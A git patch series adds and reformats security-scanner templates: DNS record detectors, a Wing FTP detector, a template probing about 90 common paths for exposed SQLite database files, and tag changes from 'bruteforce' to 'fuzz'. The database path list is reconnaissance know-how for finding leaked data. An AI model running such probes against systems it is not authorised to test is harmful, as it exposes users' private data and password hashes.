From 183277a771f53f32704767cd4a0e6b0b1eb561bd Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 24 Feb 2024 14:28:56 +0000 Subject: [PATCH 01/86] spf record detection template --- dns/spf-record-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 dns/spf-record-detect.yaml diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml new file mode 100644 index 0000000000..3dca6d7520 --- /dev/null +++ b/dns/spf-record-detect.yaml @@ -0,0 +1,23 @@ +id: spf-record + +info: + name: SPF Record Detected + author: rxerium + severity: info + description: An SPF TXT record was detected + reference: + - https://www.mimecast.com/content/how-to-create-an-spf-txt-record + tags: dns,spf + +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=spf1" + + extractors: + - type: regex + regex: + - "v=spf1(.+)" \ No newline at end of file From 51b06a5756890f2334b2147102b9d65ae759c6f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Mar 2024 09:56:31 +0530 Subject: [PATCH 02/86] fix-formatting --- dns/spf-record-detect.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index 3dca6d7520..c5583ab23a 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -1,10 +1,11 @@ -id: spf-record +id: spf-record-detect info: - name: SPF Record Detected + name: SPF Record - Detection author: rxerium severity: info - description: An SPF TXT record was detected + description: | + An SPF TXT record was detected reference: - https://www.mimecast.com/content/how-to-create-an-spf-txt-record tags: dns,spf @@ -20,4 +21,4 @@ dns: extractors: - type: regex regex: - - "v=spf1(.+)" \ No newline at end of file + - "v=spf1(.+)" From 746631b37ffba4c0a9f897567b7ff06d61f79a9e Mon Sep 17 00:00:00 2001 From: Michal Mikolas Date: Wed, 13 Mar 2024 12:51:16 +0100 Subject: [PATCH 03/86] generic-db: Added checking of SQLite database files exposure. --- http/exposures/files/generic-db.yaml | 151 +++++++++++++++++++++++++++ 1 file changed, 151 insertions(+) create mode 100644 http/exposures/files/generic-db.yaml diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml new file mode 100644 index 0000000000..a464ea071e --- /dev/null +++ b/http/exposures/files/generic-db.yaml @@ -0,0 +1,151 @@ +id: generic-db + +info: + name: Generic DB file exposure + author: Michal Mikolas (nanuqcz) + severity: high + description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. + reference: + - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite + - https://laravel.com/docs/5.2/database # database/database.sqlite + - https://github.com/laracasts/larabook/blob/master/app/config/database.php#L51 # app/database/production.sqlite + - https://forum.codeigniter.com/post-389846.html # writable/db.sqlite3 + - https://github.com/codeigniter4projects/playground/blob/develop/.env.example#L33 # writable/database.db + - https://symfony.com/doc/current/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/4.x/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/3.x/doctrine.html # app/sqlite.db + - https://symfony.com/doc/2.x/doctrine.html # sqlite.db + - https://openclassrooms.com/forum/sujet/symfony3-sqlite-could-not-create-database # var/data/db.sqlite + - https://symfony.com/doc/current/reference/configuration/doctrine.html#doctrine-dbal-configuration # var/data/data.sqlite + - https://stackoverflow.com/questions/31762878/sqlite-3-database-with-django # db.sqlite3 + - https://medium.com/@codewithbushra/using-sqlite-as-a-database-backend-in-django-projects-code-with-bushra-d23e3100686e # db.sqlite3 + - https://gist.github.com/jwo/4512764?permalink_comment_id=2235763#gistcomment-2235763 # db/production.sqlite3 + - https://stackoverflow.com/a/30345819/1632572 # db/production.sqlite3 + - https://developerhowto.com/2018/12/29/build-a-rest-api-with-node-js-and-express-js/ # db.sqlite + - https://sqldocs.org/sqlite/sqlite-nodejs/ # mydb.sqlite + - https://stackoverflow.com/questions/41620788/error-database-connection-sqlite-is-missing-or-could-not-be-created-cakephp # app/data/app_db.sqlite + - https://stackoverflow.com/questions/2722383/using-sqlite3-with-cakephp # app/webroot/database.sqlite, app/database.sqlite + - https://levelup.gitconnected.com/how-to-connect-and-use-the-sqlite-database-in-codeigniter-3-48cd50d3e78d # application/databases/db.sqlite + - https://turmanauli.medium.com/how-to-connect-codeigniter-to-sqlite3-database-like-a-pro-2177497a6d30 # application/db/database.sqlite + - https://forum.codeigniter.com/thread-74522.html # application/Database/db1.db + - https://stackoverflow.com/a/37088960/1632572 # application/database/data.db + - https://docs.laminas.dev/tutorials/getting-started/database-and-models/ # data/*.db + - https://phalcon-nucleon.github.io/#!database/getting-started.html # storage/database/database.sqlite + - https://www.yiiframework.com/doc/blog/1.1/en/prototype.database # protected/data/*.db + - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db + - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite + - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + metadata: + verified: true + tags: database,exposure,sqlite,sqlite3 + +http: + - method: GET + path: + # Recommended paths found in framework official docs or unofficial tutorials + - "{{BaseURL}}/database/database.sqlite" + - "{{BaseURL}}/database/production.sqlite" + - "{{BaseURL}}/app/database/production.sqlite" + - "{{BaseURL}}/writable/db.sqlite3" + - "{{BaseURL}}/writable/database.db" + - "{{BaseURL}}/var/app.db" + - "{{BaseURL}}/var/data/db.sqlite" + - "{{BaseURL}}/var/data/data.sqlite" + - "{{BaseURL}}/app/sqlite.db" + - "{{BaseURL}}/sqlite.db" + - "{{BaseURL}}/db.sqlite3" + - "{{BaseURL}}/db/production.sqlite3" + - "{{BaseURL}}/db.sqlite" + - "{{BaseURL}}/mydb.sqlite" + - "{{BaseURL}}/app/data/app_db.sqlite" + - "{{BaseURL}}/app/webroot/database.sqlite" + - "{{BaseURL}}/app/database.sqlite" + - "{{BaseURL}}/application/databases/db.sqlite" + - "{{BaseURL}}/application/db/database.sqlite" + - "{{BaseURL}}/application/Database/db1.db" + - "{{BaseURL}}/application/database/data.db" + - "{{BaseURL}}/data/app.db" + - "{{BaseURL}}/data/sqlite.db" + - "{{BaseURL}}/data/sqlite3.db" + - "{{BaseURL}}/data/database.db" + - "{{BaseURL}}/data/production.db" + - "{{BaseURL}}/storage/database/database.sqlite" + - "{{BaseURL}}/protected/data/app.db" + - "{{BaseURL}}/protected/data/sqlite.db" + - "{{BaseURL}}/protected/data/sqlite3.db" + - "{{BaseURL}}/protected/data/database.db" + - "{{BaseURL}}/protected/data/production.db" + - "{{BaseURL}}/db/database.db" + - "{{BaseURL}}/db/database.sqlite" + - "{{BaseURL}}/app/Model/app.db" + - "{{BaseURL}}/app/Model/sqlite.db" + - "{{BaseURL}}/app/Model/sqlite3.db" + - "{{BaseURL}}/app/Model/database.db" + - "{{BaseURL}}/app/Model/production.db" + + # General paths + - "{{BaseURL}}/app.db" + - "{{BaseURL}}/sqlite3.db" + - "{{BaseURL}}/app.sqlite" + - "{{BaseURL}}/app.sqlite3" + - "{{BaseURL}}/database.db" + - "{{BaseURL}}/database.sqlite" + - "{{BaseURL}}/database.sqlite3" + - "{{BaseURL}}/production.db" + - "{{BaseURL}}/production.sqlite" + - "{{BaseURL}}/production.sqlite3" + - "{{BaseURL}}/db/db.sqlite" + - "{{BaseURL}}/db/db.sqlite3" + - "{{BaseURL}}/db/sqlite.db" + - "{{BaseURL}}/db/sqlite3.db" + - "{{BaseURL}}/db/app.db" + - "{{BaseURL}}/db/app.sqlite" + - "{{BaseURL}}/db/app.sqlite3" + - "{{BaseURL}}/db/database.sqlite3" + - "{{BaseURL}}/db/production.db" + - "{{BaseURL}}/db/production.sqlite" + - "{{BaseURL}}/app/db.sqlite" + - "{{BaseURL}}/app/db.sqlite3" + - "{{BaseURL}}/app/sqlite3.db" + - "{{BaseURL}}/app/app.db" + - "{{BaseURL}}/app/app.sqlite" + - "{{BaseURL}}/app/app.sqlite3" + - "{{BaseURL}}/app/database.db" + - "{{BaseURL}}/app/database.sqlite3" + - "{{BaseURL}}/app/production.db" + - "{{BaseURL}}/app/production.sqlite" + - "{{BaseURL}}/app/production.sqlite3" + - "{{BaseURL}}/data/db.sqlite" + - "{{BaseURL}}/data/db.sqlite3" + - "{{BaseURL}}/data/app.sqlite" + - "{{BaseURL}}/data/app.sqlite3" + - "{{BaseURL}}/data/database.sqlite" + - "{{BaseURL}}/data/database.sqlite3" + - "{{BaseURL}}/data/production.sqlite" + - "{{BaseURL}}/data/production.sqlite3" + - "{{BaseURL}}/database/db.sqlite" + - "{{BaseURL}}/database/db.sqlite3" + - "{{BaseURL}}/database/sqlite.db" + - "{{BaseURL}}/database/sqlite3.db" + - "{{BaseURL}}/database/app.db" + - "{{BaseURL}}/database/app.sqlite" + - "{{BaseURL}}/database/app.sqlite3" + - "{{BaseURL}}/database/database.db" + - "{{BaseURL}}/database/database.sqlite3" + - "{{BaseURL}}/database/production.db" + - "{{BaseURL}}/database/production.sqlite3" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + negative: true + words: + - " Date: Fri, 15 Mar 2024 18:15:11 +0530 Subject: [PATCH 04/86] Create wing-ftp-service-detect.yaml --- .../technologies/wing-ftp-service-detect.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/technologies/wing-ftp-service-detect.yaml diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..0e444d1079 --- /dev/null +++ b/http/technologies/wing-ftp-service-detect.yaml @@ -0,0 +1,24 @@ +id: wing-ftp-service-detect + +info: + name: Wing FTP Service - Detect + author: ritikchaddha + severity: info + description: | + The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + metadata: + max-request: 1 + verified: true + shodan-query: "Wing FTP Server" + tags: tech,ftp,wing,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Wing FTP Server" From 30b2cc145bd81a8db4a8d485064086264682cf19 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:20:38 +0000 Subject: [PATCH 05/86] txt service detector --- dns/txt-service-detector.yaml | 218 ++++++++++++++++++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 dns/txt-service-detector.yaml diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml new file mode 100644 index 0000000000..2d35ce1e51 --- /dev/null +++ b/dns/txt-service-detector.yaml @@ -0,0 +1,218 @@ +id: txt-service-detector + +info: + name: DNS TXT Service Detector + author: rxerium + severity: info + description: Template to detect services associated with a domain through TXT records. + reference: + - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com + metadata: + max-request: 1 + tags: dns,txt + +dns: + - name: "{{FQDN}}" + type: TXT + + matchers-condition: or + matchers: + - type: word + name: "Keybase" + words: + - "keybase-site-verification" + + - type: word + name: "Proton Mail" + words: + - "protonmail-verification" + + - type: word + name: "Webex" + words: + - "webexdomainverification" + + - type: word + name: "Apple" + words: + - "apple-domain-verification" + + - type: word + name: "Facebook" + words: + - "facebook-domain-verification" + + - type: word + name: "Autodesk" + words: + - "autodesk-domain-verification" + + - type: word + name: "Stripe" + words: + - "stripe-verification" + + - type: word + name: "Atlassian" + words: + - "atlassian-domain-verification" + + - type: word + name: "Adobe Sign" + words: + - "adobe-sign-verification" + + - type: word + name: "Zoho" + words: + - "zoho-verification" + + - type: word + name: "Have I been Pwned" + words: + - "have-i-been-pwned-verification" + + - type: word + name: "KnowBe4" + words: + - "knowbe4-site-verification" + + - type: word + name: "Jamf" + words: + - "jamf-site-verification" + + - type: word + name: "Parallels" + words: + - "parallels-domain-verification" + + - type: word + name: "Dropbox" + words: + - "dropbox-domain-verification" + + - type: word + name: "VMWare Cloud" + words: + - "vmware-cloud-verification" + + - type: word + name: "Canva" + words: + - "canva-site-verification" + + - type: word + name: "MongoDB" + words: + - "mongodb-site-verification" + + - type: word + name: "Slack" + words: + - "slack-domain-verification" + + - type: word + name: "TeamViewer" + words: + - "teamviewer-sso-verification" + + - type: word + name: "Bugcrowd" + words: + - "bugcrowd-verification" + + - type: word + name: "Cisco" + words: + - "cisco-site-verification" + + - type: word + name: "Palo Alto Networks" + words: + - "paloaltonetworks-site-verification" + + - type: word + name: "Twilio" + words: + - "twilio-domain-verification" + + - type: word + name: "Dell Technologies" + words: + - "dell-technologies-domain-verification" + + - type: word + name: "1password" + words: + - "1password-site-verification" + + - type: word + name: "Duo" + words: + - "duo_sso_verification" + + - type: word + name: "Sophos" + words: + - "sophos-domain-verification" + + - type: word + name: "Pinterest" + words: + - "pinterest-site-verification" + + - type: word + name: "Citrix" + words: + - "citrix-verification-code" + + - type: word + name: "Zapier" + words: + - "zapier-domain-verification-challenge" + + - type: word + name: "Uber" + words: + - "uber-domain-verification" + + - type: word + name: "Zoom" + words: + - "zoom-domain-verification" + + - type: word + name: "Lastpass" + words: + - "lastpass-verification-code" + + - type: word + name: "Google Workspace" + words: + - "google-site-verification" + + - type: word + name: "Flexera" + words: + - "flexera-domain-verification" + + - type: word + name: "Yandex" + words: + - "yandex-verification" + + - type: word + name: "Calendly" + words: + - "calendly-site-verification" + + - type: word + name: "Docusign" + words: + - "docusign" + + - type: word + name: "Whimsical" + words: + - "whimsical" \ No newline at end of file From 2c9eae17f4a063c33d0bb43fa96f3981e9cf8077 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:26:20 +0000 Subject: [PATCH 06/86] remove trailing spaces --- dns/txt-service-detector.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml index 2d35ce1e51..55ea7d2e11 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detector.yaml @@ -101,7 +101,7 @@ dns: name: "Canva" words: - "canva-site-verification" - + - type: word name: "MongoDB" words: @@ -151,7 +151,7 @@ dns: name: "Duo" words: - "duo_sso_verification" - + - type: word name: "Sophos" words: @@ -201,7 +201,7 @@ dns: name: "Yandex" words: - "yandex-verification" - + - type: word name: "Calendly" words: From d95c5384653fbc8355995a5355f90bdc82b076a6 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:28:54 +0000 Subject: [PATCH 07/86] remove another trailing space --- dns/txt-service-detector.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml index 55ea7d2e11..24aa069286 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detector.yaml @@ -4,7 +4,7 @@ info: name: DNS TXT Service Detector author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: Template to detect services associated with a domain through TXT records. reference: - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com metadata: From 39ad0b0f680f302a6a823e9f49fe64956fbd694f Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:54:28 +0000 Subject: [PATCH 08/86] soa-detection --- dns/soa-detect.yaml | 79 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 dns/soa-detect.yaml diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml new file mode 100644 index 0000000000..d2fef30649 --- /dev/null +++ b/dns/soa-detect.yaml @@ -0,0 +1,79 @@ +id: soa-detect + +info: + name: SOA record service detection + author: rxerium + severity: info + description: Detects which domain provider a domain is using, detected through SOA records + reference: + - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/ + metadata: + max-request: 1 + tags: dns,soa + +dns: + - name: "{{FQDN}}" + type: SOA + matchers-condition: or + matchers: + - type: word + name: "Cloudflare" + words: + - "dns.cloudflare.com" + + - type: word + name: "Amazon Web Services" + words: + - "awsdns" + + - type: word + name: "Akamai" + words: + - "hostmaster.akamai.com" + + - type: word + name: "Azure" + words: + - "azure-dns.com" + + - type: word + name: "NS1" + words: + - "nsone.net" + + - type: word + name: "Verizon" + words: + - "verizon.com" + + - type: word + name: "Google Cloud Platform" + words: + - "googledomains.com" + - "google.com" + + - type: word + name: "Alibaba" + words: + - "alibabadns.com" + + - type: word + name: "Safeway" + words: + - "safeway.com" + + - type: word + name: "Mark Monitor" + words: + - "markmonitor.com" + - "markmonitor.zone" + + - type: word + name: "Hetznet" + words: + - "hetzner.com" + + - type: word + name: "Edge Cast" + words: + - "edgecastdns.net" \ No newline at end of file From d81a235f973842fee38c116721cf5b691728f08c Mon Sep 17 00:00:00 2001 From: Michal Mikolas Date: Mon, 18 Mar 2024 21:37:49 +0100 Subject: [PATCH 09/86] generic-db: Added more exact matchers to make sure the exposured file is really SQLite file. --- http/exposures/files/generic-db.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index a464ea071e..f1f4d041b6 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -35,6 +35,8 @@ info: - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + - https://www.sqlite.org/fileformat.html # SQLite file always starts with "SQLite format {sqlite_version}" + - https://en.wikipedia.org/wiki/List_of_file_signatures # SQLite binary signature: 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -144,8 +146,14 @@ http: status: - 200 + # SQLite file always starts with "SQLite format {sqlite_version}" - type: word part: body - negative: true words: - - " Date: Mon, 18 Mar 2024 22:51:49 +0100 Subject: [PATCH 10/86] generic-db: Improved SQLite file signature matcher to match exactly beginning of the document. --- http/exposures/files/generic-db.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index f1f4d041b6..811540a3c6 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -147,10 +147,9 @@ http: - 200 # SQLite file always starts with "SQLite format {sqlite_version}" - - type: word - part: body - words: - - "SQLite format " + - type: dsl + dsl: + - 'startswith(body, "SQLite format ")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - type: word From cf48f45e13aedd538df34c5033f390dca36b7c9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:27:34 +0530 Subject: [PATCH 11/86] formatting --- dns/soa-detect.yaml | 34 +++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index d2fef30649..eb6eda0782 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml @@ -1,79 +1,83 @@ id: soa-detect info: - name: SOA record service detection + name: SOA Record Service - Detection author: rxerium severity: info - description: Detects which domain provider a domain is using, detected through SOA records + description: | + Detects which domain provider a domain is using, detected through SOA records reference: - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/ metadata: max-request: 1 + verified: true tags: dns,soa dns: - name: "{{FQDN}}" + type: SOA + matchers-condition: or matchers: - type: word - name: "Cloudflare" + name: "cloudflare" words: - "dns.cloudflare.com" - type: word - name: "Amazon Web Services" + name: "amazon-web-services" words: - "awsdns" - type: word - name: "Akamai" + name: "akamai" words: - "hostmaster.akamai.com" - type: word - name: "Azure" + name: "azure" words: - "azure-dns.com" - type: word - name: "NS1" + name: "ns1" words: - "nsone.net" - type: word - name: "Verizon" + name: "verizon" words: - "verizon.com" - type: word - name: "Google Cloud Platform" + name: "google-cloud-platform" words: - "googledomains.com" - "google.com" - type: word - name: "Alibaba" + name: "alibaba" words: - "alibabadns.com" - type: word - name: "Safeway" + name: "safeway" words: - "safeway.com" - type: word - name: "Mark Monitor" + name: "mark-monitor" words: - "markmonitor.com" - "markmonitor.zone" - type: word - name: "Hetznet" + name: "hetznet" words: - "hetzner.com" - type: word - name: "Edge Cast" + name: "edge-cast" words: - - "edgecastdns.net" \ No newline at end of file + - "edgecastdns.net" From cc690eb154d87f11a784f7f285af2df2504ed39e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:37:00 +0530 Subject: [PATCH 12/86] fix formatting --- ...-detector.yaml => txt-service-detect.yaml} | 90 ++++++++++--------- 1 file changed, 46 insertions(+), 44 deletions(-) rename dns/{txt-service-detector.yaml => txt-service-detect.yaml} (70%) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detect.yaml similarity index 70% rename from dns/txt-service-detector.yaml rename to dns/txt-service-detect.yaml index 24aa069286..d286a8d2fe 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detect.yaml @@ -1,14 +1,16 @@ -id: txt-service-detector +id: txt-service-detect info: - name: DNS TXT Service Detector + name: DNS TXT Service - Detect author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: | + Finding the services companies use via their TXT records. reference: - - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com + - https://www.abenezer.ca/blog/services-companies-use-txt-records metadata: max-request: 1 + verified: true tags: dns,txt dns: @@ -18,127 +20,127 @@ dns: matchers-condition: or matchers: - type: word - name: "Keybase" + name: "keybase" words: - "keybase-site-verification" - type: word - name: "Proton Mail" + name: "proton-mail" words: - "protonmail-verification" - type: word - name: "Webex" + name: "webex" words: - "webexdomainverification" - type: word - name: "Apple" + name: "apple" words: - "apple-domain-verification" - type: word - name: "Facebook" + name: "facebook" words: - "facebook-domain-verification" - type: word - name: "Autodesk" + name: "autodesk" words: - "autodesk-domain-verification" - type: word - name: "Stripe" + name: "stripe" words: - "stripe-verification" - type: word - name: "Atlassian" + name: "atlassian" words: - "atlassian-domain-verification" - type: word - name: "Adobe Sign" + name: "adobe-sign" words: - "adobe-sign-verification" - type: word - name: "Zoho" + name: "zoho" words: - "zoho-verification" - type: word - name: "Have I been Pwned" + name: "have-i-been-pwned" words: - "have-i-been-pwned-verification" - type: word - name: "KnowBe4" + name: "knowbe4" words: - "knowbe4-site-verification" - type: word - name: "Jamf" + name: "jamf" words: - "jamf-site-verification" - type: word - name: "Parallels" + name: "parallels" words: - "parallels-domain-verification" - type: word - name: "Dropbox" + name: "dropbox" words: - "dropbox-domain-verification" - type: word - name: "VMWare Cloud" + name: "vmware-cloud" words: - "vmware-cloud-verification" - type: word - name: "Canva" + name: "canva" words: - "canva-site-verification" - type: word - name: "MongoDB" + name: "mongodb" words: - "mongodb-site-verification" - type: word - name: "Slack" + name: "slack" words: - "slack-domain-verification" - type: word - name: "TeamViewer" + name: "teamViewer" words: - "teamviewer-sso-verification" - type: word - name: "Bugcrowd" + name: "bugcrowd" words: - "bugcrowd-verification" - type: word - name: "Cisco" + name: "cisco" words: - "cisco-site-verification" - type: word - name: "Palo Alto Networks" + name: "palo-alto-networks" words: - "paloaltonetworks-site-verification" - type: word - name: "Twilio" + name: "twilio" words: - "twilio-domain-verification" - type: word - name: "Dell Technologies" + name: "dell-technologies" words: - "dell-technologies-domain-verification" @@ -148,71 +150,71 @@ dns: - "1password-site-verification" - type: word - name: "Duo" + name: "duo" words: - "duo_sso_verification" - type: word - name: "Sophos" + name: "sophos" words: - "sophos-domain-verification" - type: word - name: "Pinterest" + name: "pinterest" words: - "pinterest-site-verification" - type: word - name: "Citrix" + name: "citrix" words: - "citrix-verification-code" - type: word - name: "Zapier" + name: "zapier" words: - "zapier-domain-verification-challenge" - type: word - name: "Uber" + name: "uber" words: - "uber-domain-verification" - type: word - name: "Zoom" + name: "zoom" words: - "zoom-domain-verification" - type: word - name: "Lastpass" + name: "lastpass" words: - "lastpass-verification-code" - type: word - name: "Google Workspace" + name: "google-workspace" words: - "google-site-verification" - type: word - name: "Flexera" + name: "flexera" words: - "flexera-domain-verification" - type: word - name: "Yandex" + name: "yandex" words: - "yandex-verification" - type: word - name: "Calendly" + name: "calendly" words: - "calendly-site-verification" - type: word - name: "Docusign" + name: "docusign" words: - "docusign" - type: word - name: "Whimsical" + name: "whimsical" words: - - "whimsical" \ No newline at end of file + - "whimsical" From b9a4f8433e18a09402165f91be334a0f56774eb6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Mar 2024 20:50:31 +0530 Subject: [PATCH 13/86] reverted bruteforce tags to fuzz --- .nuclei-ignore | 1 - cloud/enum/azure-vm-cloud-enum.yaml | 2 +- config/bugbounty.yml | 2 +- config/pentest.yml | 2 +- config/recommended.yml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/default-logins/oracle/peoplesoft-default-login.yaml | 2 +- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposures/backups/php-backup-files.yaml | 2 +- http/fuzzing/cache-poisoning-fuzz.yaml | 2 +- http/fuzzing/header-command-injection.yaml | 2 +- http/fuzzing/iis-shortname.yaml | 2 +- http/fuzzing/linux-lfi-fuzzing.yaml | 2 +- http/fuzzing/mdb-database-file.yaml | 2 +- http/fuzzing/prestashop-module-fuzz.yaml | 2 +- http/fuzzing/ssrf-via-proxy.yaml | 2 +- http/fuzzing/valid-gmail-check.yaml | 2 +- http/fuzzing/waf-fuzz.yaml | 2 +- http/fuzzing/wordpress-plugins-detect.yaml | 4 ++-- http/fuzzing/wordpress-themes-detect.yaml | 2 +- http/fuzzing/wordpress-weak-credentials.yaml | 2 +- http/fuzzing/xff-403-bypass.yaml | 2 +- http/miscellaneous/defacement-detect.yaml | 2 +- http/miscellaneous/ntlm-directories.yaml | 2 +- http/misconfiguration/aem/aem-userinfo-servlet.yaml | 2 +- http/misconfiguration/gitlab/gitlab-user-enum.yaml | 2 +- http/misconfiguration/proxy/open-proxy-internal.yaml | 2 +- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 +- http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- http/technologies/graylog/graylog-api-exposure.yaml | 2 +- http/vulnerabilities/tongda/tongda-auth-bypass.yaml | 2 +- http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 3 ++- javascript/default-logins/ssh-default-logins.yaml | 2 +- network/misconfig/mysql-native-password.yaml | 2 +- network/misconfig/tidb-native-password.yaml | 2 +- 40 files changed, 41 insertions(+), 41 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 4714e3b0df..40720ba50a 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -16,7 +16,6 @@ tags: - "fuzz" - "dos" - "local" - - "brute-force" - "bruteforce" - "phishing" diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index c9eb876265..62be7fe992 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,azure,bruteforce,enum + tags: cloud,cloud-enum,azure,fuzz,enum self-contained: true diff --git a/config/bugbounty.yml b/config/bugbounty.yml index b75b98dc83..0b04440ca1 100644 --- a/config/bugbounty.yml +++ b/config/bugbounty.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - fuzz - creds-stuffing - token-spray - osint \ No newline at end of file diff --git a/config/pentest.yml b/config/pentest.yml index dc2466e291..2546416b85 100644 --- a/config/pentest.yml +++ b/config/pentest.yml @@ -15,5 +15,5 @@ type: exclude-tags: - dos - - brute-force + - fuzz - osint \ No newline at end of file diff --git a/config/recommended.yml b/config/recommended.yml index c3b24db1a9..fd09c67f0a 100644 --- a/config/recommended.yml +++ b/config/recommended.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - fuzz - creds-stuffing - token-spray - osint diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index fd29113e97..a19b300778 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -28,7 +28,7 @@ info: max-request: 65 vendor: embedthis product: goahead - tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis http: - raw: diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index e7cd0c42d7..babc75564f 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -27,7 +27,7 @@ info: max-request: 100 vendor: zabbix product: zabbix - tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix + tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix http: - raw: diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index f5297ad76b..81846921c0 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -28,7 +28,7 @@ info: vendor: automattic product: sensei_lms framework: 